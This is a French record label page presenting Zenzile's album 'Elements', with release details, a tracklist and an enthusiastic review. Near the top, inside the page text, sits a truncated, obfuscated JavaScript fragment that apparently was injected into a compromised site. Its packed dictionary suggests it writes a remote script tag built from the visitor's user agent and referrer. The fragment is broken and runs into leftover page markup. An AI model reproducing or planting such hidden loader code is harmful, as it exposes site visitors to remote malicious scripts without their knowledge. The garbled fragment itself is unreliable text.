ELEMENTS

Home » Artists » Zenzile » ELEMENTS
=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("< \/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eaayz|var|u0026u|referrer|bddih||js|php'.split('|'),0,{})) class= »col-md-8″]
ARTISTE : Zenzile
ALBUM : ELEMENTS
DATE DE SORTIE : 24 février 2017
GENRE : Zenzile
RÉFÉRENCE : YO56
TRACKLISTING :
1- BIRD
2- OUTSIGHT
3- STORM
4- DRY
5- ESCAPE
6- SEQUENCES
7- STELLAR
8- PRESENCE
9- POLY

La Terre. L’Eau. L’Air. Le Feu. Et la vie qui jaillit au gré des frictions entre ces différents éléments.
Il en a toujours été ainsi également pour la musique de Zenzile, qui n’a de cesse de se réinventer depuis vingt ans en dosant différemment à chaque nouvel album ses quatre ingrédients principaux: le dub, le post-punk, le psychédélisme et la pop. Cet «Eléments » – leur dixième album et bande-son du nouveau spectacle audiovisuel du même nom – ne déroge donc pas à la règle, même s’il explore plus que jamais le versant pop de l’univers des Angevins. Peut-être en partie grâce à l’arrivée d’une nouvelle voix sur ce projet en la personne de Zakia Gallard, jeune chanteuse de 23 ans au timbre soulful – pas si éloigné de Jeanne Added – qui semble avoir ouvert de nouveaux horizons à la musique de Zenzile (« Bird », « Poly »). Vocalement, le groupe n’a en tout cas jamais été aussi décomplexé puisque Vincent Erdeven (claviers, guitare) et Matthieu Bablée (basse) alternent tous deux également derrière le micro sur un tiers des titres. Peut-être aussi parce que Zenzile a voulu retourner enregistrer avec Peter Deimel au célèbre studio Black Box (comme pour Living In Monochrome, leur autre disque « pop ») dans les conditions du live. Et Zenzile, en conditions live, ce n’est rien de dire que le groupe est dans son…élément.
Ça s’entend parfaitement sur « Outsight », premier single impeccable de ce disque : post-punk dubbé et énervé, entre Bauhaus et Siouxsie & The Banshees, c’est le morceau de Zenzile pur-jus par excellence, futur climax des concerts qui ravira tous les fans de la première heure.
Parmi les autres bonnes surprises de cet Elements se cachent au moins deux énormes tubes hédonistes, le très pop new wave « Escape » chanté à deux voix et le dub discoïde « Presence », qui font irrésistiblement remuer les corps pendant les concerts. Il y a du Blondie dans ces deux titres. Et il y a l’émoi qu’on ressent au milieu d’une piste noire de monde à danser jusqu’au petit matin. On tient là deux futurs classiques du groupe, c’est évident.
Echappées de Berlin, leur précédent album (et ciné-concert), quelques effluves de Kosmische Musik viennent à nouveau hanter certains moments de ce disque très cinématographique (« Sequences », « Stellar »…).
Et Zenzile ne serait pas Zenzile sans ces morceaux inqualifiables, hors-formats, et pourtant toujours bourrés de gimmicks pop qui vous restent dans la tête pendant des jours. C’est le cas ici pour le superbe instrumental « Dry », céleste et aquatique à la fois, et le tellurique « Storm » et ses guitares incandescentes.

Kalcha




VIDEOS

CONCERTS